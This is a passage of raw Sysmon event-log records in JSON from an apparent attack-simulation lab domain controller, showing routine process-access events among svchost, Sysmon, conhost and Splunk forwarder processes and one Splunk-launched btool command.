C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.977\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00108C810500}\r\nTargetProcessId: 3120\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.977","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108C810500}","TargetProcessId":"3120","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.212\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00108C810500}\r\nSourceProcessId: 3120\r\nSourceThreadId: 2776\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.212","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00108C810500}","SourceProcessId":"3120","SourceThreadId":"2776","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.238\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-00104A840500}\r\nProcessId: 4504\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nParentProcessId: 4432\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.238","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-00104A840500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","ParentProcessId":"4432","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nSourceProcessId: 4432\r\nSourceThreadId: 3128\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","SourceProcessId":"4432","SourceThreadId":"3128","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EB-5F25-0000-0010F73D0500}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EB-5F25-0000-0010F73D0500}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 